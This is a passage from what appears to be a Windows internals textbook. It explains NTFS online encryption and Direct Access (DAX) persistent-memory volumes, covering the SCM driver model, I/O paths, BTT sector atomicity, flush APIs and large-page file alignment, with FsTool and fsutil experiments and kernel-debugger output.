table and inserting a new entry in the EfsBackup attribute), and the new clusters are inserted in place
of the previous ones. The high watermark value is increased, the file lock is released, and the online
encryption process proceeds to the next stage starting at the 6-MB offset; the previous clusters located
in the EfsBackup stream are concurrently zeroed-out and can be reused for new stages.
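The watermark rules above can be expressed as a small decision function (an illustrative Python sketch, not NTFS code):

```python
def classify_write(offset, watermark, locked_range):
    """Decide how a concurrent write is handled during online encryption.
    locked_range is the (start, end) of the 2-MB range-locked block."""
    lo, hi = locked_range
    if lo <= offset < hi:
        return "wait"                 # writes to the locked range must wait
    if offset < watermark:
        return "encrypt-then-write"   # below the watermark: encrypt first
    return "plain-write"              # beyond the watermark: original form

MB = 1024 * 1024
assert classify_write(1 * MB, watermark=4 * MB, locked_range=(4 * MB, 6 * MB)) == "encrypt-then-write"
assert classify_write(5 * MB, watermark=4 * MB, locked_range=(4 * MB, 6 * MB)) == "wait"
assert classify_write(9 * MB, watermark=4 * MB, locked_range=(4 * MB, 6 * MB)) == "plain-write"
```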
FIGURE 11-72 Example of an ongoing online encryption for a 16-MB file. (The figure shows three snapshots of the $DATA stream: before the encryption cycle, after it, and before the next cycle. Each snapshot is divided at the high watermark into an encrypted region and a non-encrypted region, with the 2-MB locked range following the watermark and the $EfsBackup attribute holding the clusters that contained the original data.)
The new implementation allows NTFS to encrypt or decrypt in place, getting rid of temporary files
(see the previous “Encrypting file data” section for more details). More importantly, it allows NTFS to
perform file encryption and decryption while other applications can still use and modify the target file
stream (the time spent with the exclusive lock held is short and not perceptible by the application that
is attempting to use the file).
Direct Access (DAX) disks
Persistent memory is an evolution of solid-state disk technology: a new kind of nonvolatile storage
medium that has RAM-like performance characteristics (low latency and high bandwidth), resides on
the memory bus (DDR), and can be used like a standard disk device.
Direct Access Disks (DAX) is the term used by the Windows operating system to refer to such persis-
tent memory technology (another common term used is storage class memory, abbreviated as SCM). A
nonvolatile dual in-line memory module (NVDIMM), shown in Figure 11-73, is an example of this new type
of storage. NVDIMM is a type of memory that retains its contents even when electrical power is removed.
“Dual in-line” identifies the memory as using DIMM packaging. At the time of writing, there are three
different types of NVDIMMs: NVDIMM-F contains only flash storage; NVDIMM-N, the most common, is
produced by combining flash storage and traditional DRAM chips on the same module; and NVDIMM-P has persistent DRAM chips, which do not lose data in the event of a power failure.
One of the main characteristics of DAX, which is key to its fast performance, is the support of zero-
copy access to persistent memory. This means that many components, like the file system driver and
memory manager, need to be updated to support DAX, which is a disruptive technology.
Windows Server 2016 was the first Windows operating system to support DAX: the new storage
model provides compatibility with most existing applications, which can run on DAX disks without any
modification. For fastest performance, files and directories on a DAX volume need to be mapped in
memory using memory-mapped APIs, and the volume needs to be formatted in a special DAX mode.
At the time of this writing, only NTFS supports DAX volumes.
FIGURE 11-73 An NVDIMM, which has DRAM and Flash chips. An attached battery or on-board supercapacitors are
needed for maintaining the data in the DRAM chips.
The following sections describe the way in which direct access disks operate and detail the architecture of the new driver model and the modifications to the main components responsible for DAX
volume support: the NTFS driver, memory manager, cache manager, and I/O manager. Additionally,
inbox and third-party file system filter drivers (including mini filters) must also be individually updated
to take full advantage of DAX.
DAX driver model
To support DAX volumes, Windows needed to introduce a brand-new storage driver model. The SCM
Bus Driver (Scmbus.sys) is a new bus driver that enumerates physical and logical persistent memory
(PM) devices on the system, which are attached to its memory bus (the enumeration is performed
thanks to the NFIT ACPI table). The bus driver, which is not considered part of the I/O path, is a primary
bus driver managed by the ACPI enumerator, which is provided by the HAL (hardware abstraction
layer) through the hardware database registry key (HKLM\SYSTEM\CurrentControlSet\Enum\ACPI).
More details about Plug Play Device enumeration are available in Chapter 6 of Part 1.
Figure 11-74 shows the architecture of the SCM storage driver model. The SCM bus driver creates
two different types of device objects:
■ Physical device objects (PDOs) represent physical PM devices. An NVDIMM device is usually
composed of one or multiple interleaved NVDIMM-N modules. In the former case, the SCM bus
driver creates only one physical device object representing the NVDIMM unit. In the latter case,
it creates two distinct devices that represent each NVDIMM-N module. All the physical devices
are managed by the miniport driver, Nvdimm.sys, which controls a physical NVDIMM and is
responsible for monitoring its health.
■ Functional device objects (FDOs) represent single DAX disks, which are managed by the persistent memory driver, Pmem.sys. The driver controls any byte-addressable interleave sets and is
responsible for all I/O directed to a DAX volume. The persistent memory driver is the class driver
for each DAX disk. (It replaces Disk.sys in the classical storage stack.)
Both the SCM bus driver and the NVDIMM miniport driver expose some interfaces for communica-
tion with the PM class driver. Those interfaces are exposed through an IRP_MJ_PNP major function
by using the IRP_MN_QUERY_INTERFACE request. When the request is received, the SCM bus driver
knows that it should expose its communication interface because callers specify the {8de064ff-b630-
42e4-ea88-6f24c8641175} interface GUID. Similarly, the persistent memory driver requests a communication interface to the NVDIMM devices through the {0079c21b-917e-405e-cea9-0732b5bbcebd} GUID.
FIGURE 11-74 The SCM storage driver model. (In the figure, ACPI.sys and scmbus.sys enumerate the devices; the type-specific NVDIMM miniport drivers, Nvdimm.sys, manage the status of the physical NVDIMMs, while the common PM disk class driver, Pmem.sys, manages the status of the logical disk and performs I/O, both block and DAX, directly to the NVDIMM.)
The new storage driver model implements a clear separation of responsibilities: The PM class driver man-
ages logical disk functionality (open, close, read, write, memory mapping, and so on), whereas NVDIMM
drivers manage the physical device and its health. It will be easy in the future to add support for new types
of NVDIMM by just updating the Nvdimm.sys driver. (Pmem.sys doesn’t need to change.)
DAX volumes
The DAX storage driver model introduces a new kind of volume: the DAX volumes. When a user first
formats a partition through the Format tool, she can specify the /DAX argument to the command line. If
the underlying medium is a DAX disk, and it’s partitioned using the GPT scheme, before creating the basic
disk data structure needed for the NTFS file system, the tool writes the GPT_BASIC_DATA_ATTRIBUTE_DAX
flag in the target volume GPT partition entry (which corresponds to bit number 58). A good reference
for the GUID partition table is available at https://en.wikipedia.org/wiki/GUID_Partition_Table.
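Under the stated layout, checking the flag in a partition entry's 64-bit attribute field amounts to a single bit test (Python sketch; the constant's bit position comes from the text above):

```python
GPT_BASIC_DATA_ATTRIBUTE_DAX = 1 << 58  # bit 58 of the partition attributes

def partition_is_dax(attributes):
    """Check the DAX flag in a GPT partition entry's 64-bit attribute field."""
    return bool(attributes & GPT_BASIC_DATA_ATTRIBUTE_DAX)

assert partition_is_dax(1 << 58)
assert not partition_is_dax(0)
```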
When the NTFS driver then mounts the volume, it recognizes the flag and sends a STORAGE_
QUERY_PROPERTY control code to the underlying storage driver. The IOCTL is recognized by the SCM
bus driver, which responds to the file system driver with another flag specifying that the underlying
disk is a DAX disk. Only the SCM bus driver can set the flag. Once the two conditions are verified, and as
long as DAX support is not disabled through the HKLM\System\CurrentControlSet\Control\FileSystem\
NtfsEnableDirectAccess registry value, NTFS enables DAX volume support.
DAX volumes are different from the standard volumes mainly because they support zero-copy ac-
cess to the persistent memory. Memory-mapped files provide applications with direct access to the un-
derlying hardware disk sectors (through a mapped view), meaning that no intermediary components
will intercept any I/O. This characteristic provides extreme performance (but as mentioned earlier, can
impact file system filter drivers, including minifilters).
When an application creates a memory-mapped section backed by a file that resides on a DAX vol-
ume, the memory manager asks the file system whether the section should be created in DAX mode,
which is true only if the volume has been formatted in DAX mode, too. When the file is later mapped
through the MapViewOfFile API, the memory manager asks the file system for the physical memory
range of a given range of the file. The file system driver translates the requested file range in one or
more volume relative extents (sector offset and length) and asks the PM disk class driver to translate
the volume extents into physical memory ranges. The memory manager, after receiving the physical
memory ranges, updates the target process page tables for the section to map directly to persistent
storage. This is a truly zero-copy access to storage: an application has direct access to the persistent
memory. No paging reads or paging writes will be generated. This is important; the cache manager is
not involved in this case. We examine the implications of this later in the chapter.
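The two-step translation can be sketched with a toy model (Python; the extent layout and the pm_base parameter are invented for illustration, and the real work is done by the file system and PM class drivers):

```python
def map_file_range(file_extents, pm_base, file_offset, length):
    """Toy translation chain: file range -> volume extents -> physical ranges.
    file_extents: list of (file_offset, volume_offset, extent_length);
    pm_base: physical address where the PM volume begins (invented)."""
    ranges = []
    for f_off, v_off, e_len in file_extents:
        lo = max(file_offset, f_off)
        hi = min(file_offset + length, f_off + e_len)
        if lo < hi:
            # volume-relative extent first, then the physical memory range
            ranges.append((pm_base + v_off + (lo - f_off), hi - lo))
    return ranges

extents = [(0, 8192, 4096), (4096, 65536, 4096)]  # a fragmented 8-KB file
print(map_file_range(extents, pm_base=0x1000000, file_offset=0, length=8192))
# [(16785408, 4096), (16842752, 4096)]
```

The memory manager would then point the section's page tables at those physical ranges, so reads and writes through the view touch persistent storage directly.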
Applications can recognize DAX volumes by using the GetVolumeInformation API. If the returned
flags include FILE_DAX_VOLUME, the volume is formatted with a DAX-compatible file system (only
NTFS at the time of this writing). In the same way, an application can identify whether a file resides on
a DAX disk by using the GetVolumeInformationByHandle API.
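A minimal sketch of the flag test (Python; on Windows the flags value would come from GetVolumeInformation's file-system-flags output parameter, and FILE_DAX_VOLUME is the winnt.h constant 0x20000000):

```python
FILE_DAX_VOLUME = 0x20000000  # file-system flag bit, as defined in winnt.h

def volume_is_dax(fs_flags):
    """Interpret the flags returned by GetVolumeInformation; here we only
    perform the bit test on an already-obtained flags value."""
    return bool(fs_flags & FILE_DAX_VOLUME)

assert volume_is_dax(FILE_DAX_VOLUME | 0x2)  # DAX flag plus unrelated bits
assert not volume_is_dax(0x2)
```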
Cached and noncached I/O in DAX volumes
Even though memory-mapped I/O for DAX volumes provides zero-copy access to the underlying storage, DAX volumes still support I/O through standard means (via classic ReadFile and WriteFile APIs).
As described at the beginning of the chapter, Windows supports two kinds of regular I/O: cached and
noncached. Both types have significant differences when issued to DAX volumes.
Cached I/O still requires interaction from the cache manager, which, while creating a shared cache
map for the file, requires the memory manager to create a section object that directly maps to the
PM hardware. NTFS is able to communicate to the cache manager that the target file is in DAX-mode
through the new CcInitializeCacheMapEx routine. The cache manager will then copy data from the user
buffer to persistent memory: cached I/O has therefore one-copy access to persistent storage. Note that
cached I/O is still coherent with other memory-mapped I/O (the cache manager uses the same section);
as in the memory-mapped I/O case, there are still no paging reads or paging writes, so the lazy writer
thread and intelligent read-ahead are not enabled.
One implication of the direct mapping is that the cache manager directly writes to the DAX disk as
soon as the NtWriteFile function completes. This means that cached I/O is essentially noncached. For
this reason, noncached I/O requests are directly converted by the file system to cached I/O such that
the cache manager still copies directly between the user’s buffer and persistent memory. This kind of
I/O is still coherent with cached and memory-mapped I/O.
NTFS continues to use standard I/O while processing updates to its metadata files. DAX mode I/O
for each file is decided at stream creation time by setting a flag in the stream control block. If a file is
a system metadata file, the attribute is never set, so the cache manager, when mapping such a file,
creates a standard non-DAX file-backed section, which will use the standard storage stack for perform-
ing paging read or write I/Os. (Ultimately, each I/O is processed by the Pmem driver just like for block
volumes, using the sector atomicity algorithm. See the “Block volumes” section for more details.) This
behavior is needed for maintaining compatibility with write-ahead logging. Metadata must not be
persisted to disk before the corresponding log is flushed. So, if a metadata file were DAX mapped, that
write-ahead logging requirement would be broken.
Effects on file system functionality
The absence of regular paging I/O and the application’s ability to directly access persistent memory
eliminate traditional hook points that the file systems and related filters use to implement various
features. Several capabilities cannot be supported on DAX-enabled volumes, such as file encryption, compressed and sparse files, snapshots, and USN journal support.
In DAX mode, the file system no longer knows when a writable memory-mapped file is modified.
When the memory section is first created, the NTFS file system driver updates the file’s modification
and access times and marks the file as modified in the USN change journal. At the same time, it signals
a directory change notification. DAX volumes are no longer compatible with any kind of legacy filter
drivers and have a big impact on minifilters (filter manager clients). Components like BitLocker and
the volume shadow copy driver (Volsnap.sys) don’t work with DAX volumes and are removed from the
device stack. Because a minifilter no longer knows if a file has been modified, an antimalware file access
scanner, such as one described earlier, can no longer know if it should scan a file for viruses. It needs
to assume, on any handle close, that modification may have occurred. In turn, this significantly harms
performance, so minifilters must manually opt-in to support DAX volumes.
Mapping of executable images
When the Windows loader maps an executable image into memory, it uses memory-mapping services
provided by the memory manager. The loader creates a memory-mapped image section by supplying
the SEC_IMAGE flag to the NtCreateSection API. The flag specifies that the section should be mapped as an image, with all the necessary fixups applied. In DAX mode this mustn't be allowed to happen; otherwise,
all the relocations and fixups will be applied to the original image file on the PM disk. To correctly deal
with this problem, the memory manager applies the following strategies while mapping an executable
image stored in a DAX mode volume:
■ If there is already a control area that represents a data section for the binary file (meaning that
an application has opened the image for reading binary data), the memory manager creates an
empty memory-backed image section and copies the data from the existing data section to the
newly created image section; then it applies the necessary fixups.
■ If there are no data sections for the file, the memory manager creates a regular non-DAX image
section, which creates standard invalid prototype PTEs (see Chapter 5 of Part 1 for more details).
In this case, the memory manager uses the standard read and write routines of the Pmem driver
to bring data in memory when a page fault for an invalid access on an address that belongs to
the image-backed section happens.
At the time of this writing, Windows 10 does not support execution in-place, meaning that the load-
er is not able to directly execute an image from DAX storage. This is not a problem, though, because
DAX mode volumes have been originally designed to store data in a very performant way. Execution
in-place for DAX volumes will be supported in future releases of Windows.
EXPERIMENT: Witnessing DAX I/O with Process Monitor
You can witness DAX I/Os using Process Monitor from SysInternals and the FsTool.exe application,
which is available in this book’s downloadable resources. When an application reads or writes from
a memory-mapped file that resides on a DAX-mode volume, the system does not generate any
paging I/O, so nothing is visible to the NTFS driver or to the minifilters that are attached above or
below it. To witness the described behavior, just open Process Monitor, and, assuming that you
have two different volumes mounted as the P: and Q: drives, set the filters in a similar way as illus-
trated in the following figure (the Q: drive is the DAX-mode volume):
For generating I/O on DAX-mode volumes, you need to simulate a DAX copy using the FsTool
application. The following example copies an ISO image located in the P: DAX block-mode
volume (even a standard volume created on the top of a regular disk is fine for the experiment)
to the DAX-mode “Q:” drive:
P:\>fstool.exe /daxcopy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 489.67 MB/Sec
Press any key to exit...
Process Monitor has captured a trace of the DAX copy operation that confirms the
expected results:
From the trace above, you can see that on the target file (Q:\test.iso), only the
CreateFileMapping operation was intercepted: no WriteFile events are visible. While the copy
was proceeding, only paging I/O on the source file was detected by Process Monitor. These
paging I/Os were generated by the memory manager, which needed to read the data back from
the source volume as the application was generating page faults while accessing the memory-
mapped file.
To see the differences between memory-mapped I/O and standard cached I/O, you need to
copy again the file using a standard file copy operation. To see paging I/O on the source file data,
make sure to restart your system; otherwise, the original data remains in the cache:
P:\>fstool.exe /copy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 13 Sec - Transfer Rate: 313.71 MB/s.
Press any key to exit...
If you compare the trace acquired by Process Monitor with the previous one, you can con-
firm that cached I/O is a one-copy operation. The cache manager still copies chunks of memory
between the application-provided buffer and the system cache, which is mapped directly on the
DAX disk. This is confirmed by the fact that again, no paging I/O is highlighted on the target file.
As a last experiment, you can try to start a DAX copy between two files that reside on the
same DAX-mode volume or that reside on two different DAX-mode volumes:
P:\>fstool /daxcopy q:\test.iso q:\test_copy_2.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: q:\test.iso.
Target file path: q:\test_copy_2.iso.
Source Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Great! Both the source and the destination reside on a DAX volume.
Performing a full System Speed Copy!
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 501.60 MB/Sec
Press any key to exit...
The trace collected in the last experiment demonstrates that memory-mapped I/O on DAX
volumes doesn’t generate any paging I/O. No WriteFile or ReadFile events are visible on either
the source or the target file:
Block volumes
Not all the limitations brought on by DAX volumes are acceptable in certain scenarios. Windows pro-
vides backward compatibility for PM hardware through block-mode volumes, which are managed by
the entire legacy I/O stack as regular volumes used by rotating and SSD disks. Block volumes maintain
existing storage semantics: all I/O operations traverse the storage stack on the way to the PM disk class
driver. (There are no miniport drivers, though, because they’re not needed.) They’re fully compatible
with all existing applications, legacy filters, and minifilter drivers.
Persistent memory storage is able to perform I/O at byte granularity. More accurately, I/O is per-
formed at cache line granularity, which depends on the architecture but is usually 64 bytes. However,
block mode volumes are exposed as standard volumes, which perform I/O at sector granularity (512
bytes or 4 Kbytes). If a write is in progress on a DAX volume, and suddenly the drive experiences a
power failure, the block of data (sector) contains a mix of old and new data. Applications are not pre-
pared to handle such a scenario. In block mode, the sector atomicity is guaranteed by the PM disk class
driver, which implements the Block Translation Table (BTT) algorithm.
The BTT, an algorithm developed by Intel, splits available disk space into chunks of up to 512 GB,
called arenas. For each arena, the algorithm maintains a BTT, a simple indirection/lookup table that maps an LBA to an internal block belonging to the arena. For each 32-bit entry in the map, the algorithm uses the two most significant bits (MSB) to store the status of the block (three states: valid, zeroed, and error). Although the table maintains the status of each LBA, the BTT algorithm provides sector atomicity by providing a flog area, which contains an array of nfree blocks.
An nfree block contains all the data that the algorithm needs to provide sector atomicity. There are
256 nfree entries in the array; an nfree entry is 32 bytes in size, so the flog area occupies 8 KB. Each
nfree is used by one CPU, so the number of nfrees describes the number of atomic I/Os an arena can process concurrently. Figure 11-75 shows the layout of a DAX disk formatted in block mode.
The data structures used for the BTT algorithm are not visible to the file system driver. The BTT algo-
rithm eliminates possible subsector torn writes and, as described previously, is needed even on DAX-
formatted volumes in order to support file system metadata writes.
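The entry encoding and the flog sizing described above can be checked with a few lines (Python sketch; the field layout follows the text, not the full BTT specification):

```python
ARENA_MAX = 512 * 1024**3        # arenas cover up to 512 GB each
NFREE_COUNT, NFREE_SIZE = 256, 32  # 256 nfree entries of 32 bytes

def decode_btt_entry(entry):
    """Split a 32-bit BTT map entry into its status bits (the two MSBs,
    per the text: valid/zeroed/error) and the internal block number."""
    return (entry >> 30) & 0x3, entry & 0x3FFFFFFF

status, block = decode_btt_entry((0b01 << 30) | 1234)
print(status, block)             # 1 1234
print(NFREE_COUNT * NFREE_SIZE)  # 8192 bytes, i.e. the 8-KB flog area
```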
FIGURE 11-75 Layout of a DAX disk that supports sector atomicity (BTT algorithm). (The backing store is divided into arenas of up to 512 GB. Each arena contains a 4-KB arena info block, the data blocks, the nfree reserved blocks, the BTT map, the 8-KB BTT flog, and a 4-KB copy of the info block.)
Block mode volumes do not have the GPT_BASIC_DATA_ATTRIBUTE_DAX flag in their partition
entry. NTFS behaves just like with normal volumes by relying on the cache manager to perform cached
I/O, and by processing non-cached I/O through the PM disk class driver. The Pmem driver exposes read
and write functions, which perform a direct memory access (DMA) transfer by building a memory
descriptor list (MDL) for both the user buffer and device physical block address (MDLs are described in
more detail in Chapter 5 of Part 1). The BTT algorithm provides sector atomicity. Figure 11-76 shows the
I/O stack of a traditional volume, a DAX volume, and a block volume.
FIGURE 11-76 Device I/O stack comparison between traditional volumes, block mode volumes, and DAX volumes. (The traditional stack layers NTFS, Volsnap, Volmgr/Partmgr, Disk/ClassPnP, StorPort, and a miniport driver above an SSD/HDD. The PM block volume stack layers NTFS, Volsnap, and Volmgr/Partmgr above the PM disk driver. The DAX volume stack keeps only NTFS and Volmgr/Partmgr above the PM disk driver, with memory-mapped and cached I/O going directly to persistent memory.)
File system filter drivers and DAX
Legacy filter drivers and minifilters don’t work with DAX volumes. These kinds of drivers usually
augment file system functionality, often interacting with all the operations that a file system driver
manages. There are different classes of filters providing new capabilities or modifying existing func-
tionality of the file system driver: antivirus, encryption, replication, compression, Hierarchical Storage
Management (HSM), and so on. The DAX driver model significantly modifies how DAX volumes interact
with such components.
As previously discussed in this chapter, when a file is mapped in memory, the file system in DAX
mode does not receive any read or write I/O requests, and neither do any of the filter drivers that reside
above or below the file system driver. This means that filter drivers that rely on data interception will not work.
To minimize possible compatibility issues, existing minifilters will not receive a notification (through the
InstanceSetup callback) when a DAX volume is mounted. New and updated minifilter drivers that still
want to operate with DAX volumes need to specify the FLTFL_REGISTRATION_SUPPORT_DAX_VOLUME
flag when they register with the filter manager through the FltRegisterFilter kernel API.
Minifilters that decide to support DAX volumes have the limitation that they can’t intercept any
form of paging I/O. Data transformation filters (which provide encryption or compression) don’t
have any chance of working correctly for memory-mapped files; antimalware filters are impacted as
described earlier—because they must now perform scans on every open and close, losing the ability to
determine whether or not a write truly happened. (The impact is mostly tied to the detection of a file's
last update time.) Legacy filters are no longer compatible: if a driver calls the IoAttachDeviceToDeviceStack
API (or similar functions), the I/O manager simply fails the request (and logs an ETW event).
Flushing DAX mode I/Os
Traditional disks (HDD, SSD, NVMe) always include a cache that improves their overall performance.
When write I/Os are emitted from the storage driver, the actual data is first transferred into the cache,
which will be written to the persistent medium later. The operating system provides correct flushing,
which guarantees that data is written to final storage, and temporal order, which guarantees that data
is written in the correct order. For normal cached I/O, an application can call the FlushFileBuffers API to
ensure that the data is provably stored on the disk (this will generate an IRP with the IRP_MJ_FLUSH_
BUFFERS major function code that the NTFS driver will implement). Noncached I/O is directly written to
disk by NTFS so ordering and flushing aren’t concerns.
With DAX-mode volumes, this is not possible anymore. After the file is mapped in memory, the
NTFS driver has no knowledge of the data that is going to be written to disk. If an application is writing
some critical data structures on a DAX volume and the power fails, the application has no guarantees
that all of the data structures will have been correctly written in the underlying medium. Furthermore,
it has no guarantees that the order in which the data was written was the requested one. This is
because PM storage is implemented as classical physical memory from the CPU's point of view: the
processor uses its own caching mechanisms while reading from or writing to DAX volumes.
As a result, newer versions of Windows 10 had to introduce new flush APIs for DAX-mapped regions,
which perform the necessary work to optimally flush PM content from the CPU cache. The APIs are
available for both user-mode applications and kernel-mode drivers and are highly optimized based
on the CPU architecture (standard x64 systems use the CLFLUSH and CLWB opcodes, for example). An
application that wants I/O ordering and flushing on DAX volumes can call RtlGetNonVolatileToken on
a PM mapped region; the function yields back a nonvolatile token that can be subsequently used with
the RtlFlushNonVolatileMemory or RtlFlushNonVolatileMemoryRanges APIs. Both APIs perform the
actual flush of the data from the CPU cache to the underlying PM device.
Memory copy operations executed using standard OS functions perform, by default, temporal copy
operations, meaning that data always passes through the CPU cache, maintaining execution ordering.
Nontemporal copy operations, on the other hand, use specialized processor opcodes (again depend-
ing on the CPU architecture; x64 CPUs use the MOVNTI opcode) to bypass the CPU cache. In this case,
ordering is not maintained, but execution is faster. RtlWriteNonVolatileMemory exposes memory copy
operations to and from nonvolatile memory. By default, the API performs classical temporal copy op-
erations, but an application can request a nontemporal copy through the WRITE_NV_MEMORY_FLAG_
NON_ TEMPORAL flag and thus execute a faster copy operation.
Large and huge pages support
Reading or writing a file on a DAX-mode volume through memory-mapped sections is handled by the
memory manager in a similar way to non-DAX sections: if the MEM_LARGE_PAGES flag is specified at
map time, the memory manager detects that one or more file extents point to enough aligned, contigu-
ous physical space (NTFS allocates the file extents), and uses large (2 MB) or huge (1 GB) pages to map the
physical DAX space. (More details on the memory manager and large pages are available in Chapter 5 of
Part 1.) Large and huge pages have various advantages compared to traditional 4-KB pages. In particular,
they boost the performance on DAX files because they require fewer lookups in the processor’s page
table structures and require fewer entries in the processor’s translation lookaside buffer (TLB). For ap-
plications with a large memory footprint that randomly access memory, the CPU can spend a lot of time
looking up TLB entries as well as reading and writing the page table hierarchy in case of TLB misses. In ad-
dition, using large/huge pages can also result in significant commit savings because only page directory
parents and page directories (for large pages only, not huge pages) need to be charged. Page table space (4 KB
per 2 MB of leaf VA space) charges are not needed or taken. So, for example, with a 2-TB file mapping, the
system can save 4 GB of committed memory by using large and huge pages.
The NTFS driver cooperates with the memory manager to provide support for huge and large pages
while mapping files that reside on DAX volumes:
■ By default, each DAX partition is aligned on 2-MB boundaries.
■ NTFS supports 2-MB clusters. A DAX volume formatted with 2-MB clusters is guaranteed to use only large pages for every file stored in the volume.
■ 1-GB clusters are not supported by NTFS. If a file stored on a DAX volume is bigger than 1 GB, and if one or more of the file's extents are stored in enough contiguous physical space, the memory manager will map the file using huge pages (huge pages use only two page-map levels, while large pages use three levels).
As introduced in Chapter 5, for normal memory-backed sections, the memory manager uses large
and huge pages only if the extent describing the PM pages is properly aligned on the DAX volume.
(The alignment is relative to the volume’s LCN and not to the file VCN.) For large pages, this means
that the extent needs to start at a 2-MB boundary, whereas for huge pages it needs to start at a 1-GB
boundary. If a file on a DAX volume is not entirely aligned, the memory manager uses large or huge
pages only on those blocks that are aligned, while it uses standard 4-KB pages for any other blocks.
In order to facilitate and increase the usage of large pages, the NTFS file system provides the FSCTL_
SET_DAX_ALLOC_ALIGNMENT_HINT control code, which an application can use to set its preferred
alignment on new file extents. The I/O control code accepts a value that specifies the preferred align-
ment, a starting offset (which allows specifying where the alignment requirements begin), and some
flags. Usually an application sends the IOCTL to the file system driver after it has created a brand-new
file but before mapping it. In this way, while allocating space for the file, NTFS grabs free clusters that
fall within the bounds of the preferred alignment.
If the requested alignment is not available (due to high volume fragmentation, for example), the
IOCTL can specify the fallback behavior that the file system should apply: fail the request or revert to a
fallback alignment (which can be specified as an input parameter). The IOCTL can even be used on an
already-existing file, for specifying alignment of new extents. An application can query the alignment
of all the extents belonging to a file by using the FSCTL_QUERY_FILE_REGIONS control code or by using
the fsutil dax queryfilealignment command-line tool.
EXPERIMENT: Playing with DAX file alignment
You can witness the different kinds of DAX file alignment using the FsTool application available
in this book’s downloadable resources. For this experiment, you need to have a DAX volume
present on your machine. Open a command prompt window and perform the copy of a big file
(we suggest at least 4 GB) into the DAX volume using this tool. In the following example, two
DAX disks are mounted as the P: and Q: volumes. The Big_Image.iso file is copied into the Q: DAX
volume by using a standard copy operation, started by the FsTool application:
D:\>fstool.exe /copy p:\Big_DVD_Image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_DVD_Image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 10 Sec - Transfer Rate: 495.52 MB/s.
Press any key to exit...
You can check the new test.iso file’s alignment by using the /queryalign command-line argu-
ment of the FsTool.exe application, or by using the queryFileAlignment argument with the built-in
fsutil.exe tool available in Windows:
D:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region    Alignment    StartOffset    LengthInBytes
0         Other        0              0x1fd000
1         Large        0x1fd000       0x3b800000
2         Huge         0x3b9fd000     0xc0000000
3         Large        0xfb9fd000     0x13e00000
4         Other        0x10f7fd000    0x17e000
As you can read from the tool’s output, the first chunk of the file has been stored in 4-KB aligned
clusters. The offsets shown by the tool are not volume-relative offsets, or LCN, but file-relative
offsets, or VCN. This is an important distinction because the alignment needed for large and huge
pages mapping is relative to the volume’s page offset. As the file keeps growing, some of its clus-
ters will be allocated from a volume offset that is 2-MB or 1-GB aligned. In this way, those portions
of the file can be mapped by the memory manager using large and huge pages. Now, as in the
previous experiment, let’s try to perform a DAX copy by specifying a target alignment hint:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: True.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: False.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy... Success!
Total execution time: 6 Sec.
Copy Speed: 618.81 MB/Sec
Press any key to exit...
P:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region    Alignment    StartOffset    LengthInBytes
0         Huge         0              0x100000000
1         Large        0x100000000    0xf800000
2         Other        0x10f800000    0x17b000
In the latter case, the file was immediately allocated on the next 1-GB aligned cluster. The first
4-GB (0x100000000 bytes) of the file content are stored in contiguous space. When the memory
manager maps that part of the file, it only needs to use four page directory pointer table entries
(PDPTs), instead of using 2048 page tables. This will save physical memory space and drastically
improve the performance while the processor accesses the data located in the DAX section.
To confirm that the copy has been really executed using large pages, you can attach a kernel
debugger to the machine (even a local kernel debugger is enough) and use the /debug switch of
the FsTool application:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB /debug
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy...
[Debug] (PID: 10412) Source and Target file correctly mapped.
Source file mapping address: 0x000001F1C0000000 (DAX mode: 1).
Target file mapping address: 0x000001F2C0000000 (DAX mode: 1).
File offset : 0x0 - Alignment: 1GB.
Press enter to start the copy...
[Debug] (PID: 10412) File chunk’s copy successfully executed.
Press enter go to the next chunk / flush the file...
You can see the effective memory mapping using the debugger’s !pte extension. First, you
need to move to the proper process context by using the .process command, and then you can
analyze the mapped virtual address shown by FsTool:
8: kd> !process 0n10412 0
Searching for Process with Cid == 28ac
PROCESS ffffd28124121080
SessionId: 2 Cid: 28ac Peb: a29717c000 ParentCid: 31bc
DirBase: 4cc491000 ObjectTable: ffff950f94060000 HandleCount: 49.
Image: FsTool.exe
8: kd> .process /i ffffd28124121080
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
8: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`3d7e8e50 cc int 3
8: kd> !pte 0x000001F2C0000000
VA 000001f2c0000000
PXE at FFFFB8DC6E371018      PPE at FFFFB8DC6E203E58      PDE at FFFFB8DC407CB000      PTE at FFFFB880F9600000
